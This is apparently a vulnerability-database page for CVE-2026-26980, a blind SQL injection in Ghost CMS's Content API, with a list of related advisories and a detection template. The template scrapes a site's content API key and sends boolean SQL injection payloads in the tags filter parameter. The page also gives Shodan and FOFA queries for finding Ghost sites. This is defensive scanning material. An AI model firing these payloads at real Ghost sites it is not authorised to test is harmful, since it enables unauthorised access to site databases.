| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
| Exploit for SQL Injection in Ghost | 29 May 202604:16 | – | githubexploit | |
| Exploit for SQL Injection in Ghost | 17 Apr 202619:15 | – | githubexploit | |
| Exploit for SQL Injection in Ghost | 29 Mar 202622:00 | – | githubexploit | |
| Exploit for SQL Injection in Ghost | 26 Jun 202616:50 | – | githubexploit | |
| CVE-2026-26980 | 20 Feb 202601:00 | – | attackerkb | |
| The vulnerability of the Ghost content management system, related to the lack of measures taken to protect the SQL query structure, allows attackers to gain unauthorized access to the protected information. | 15 Jun 202600:00 | – | bdu_fstec | |
| CVE-2026-26980 | 20 Feb 202602:18 | – | circl | |
| Ghost SQL注入漏洞 | 20 Feb 202600:00 | – | cnnvd | |
| CVE-2026-26980 | 20 Feb 202601:00 | – | cve | |
| CVE-2026-26980 Ghost has a SQL Injection in its Content API | 20 Feb 202601:00 | – | cvelist |
id: CVE-2026-26980
info:
name: Ghost CMS Content API - SQL Injection
author: domwhewell-sage
severity: critical
description: |
Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.
impact: |
An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.
remediation: |
Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.
reference:
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97
- https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91
- https://nvd.nist.gov/vuln/detail/CVE-2026-26980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score: 9.4
cve-id: CVE-2026-26980
epss-score: 0.69996
epss-percentile: 0.99294
cwe-id: CWE-89
cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
metadata:
verified: true
max-request: 5
vendor: ghost
product: ghost
framework: node.js
shodan-query: http.component:"Ghost"
fofa-query: app="Ghost"
tags: cve,cve2026,ghost,ghostcms,sqli,vuln,vkev
flow: |
http(1) && http(2) && http(3)
http:
- id: extract-api-key
method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
extractors:
- type: regex
name: api_key
part: body
group: 1
regex:
- 'data-key="([a-f0-9]{20,})"'
internal: true
- id: extract-first-slug
method: GET
path:
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null"
extractors:
- type: json
part: body
name: first_slug
json:
- '.tags[0].slug'
internal: true
- id: check-sqli
method: GET
path:
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
- "{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]"
matchers:
- type: dsl
dsl:
- "len(body_1) != len(body_2)"
# digest: 490a0046304402207816a74d5ad419638deeb17d63d773b5c8410bf4021804c0e6e429a89067369802207444da8591cea8f38f196bfcf35edcdd73281edb3c3647eb443d9a9e6548ad33:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation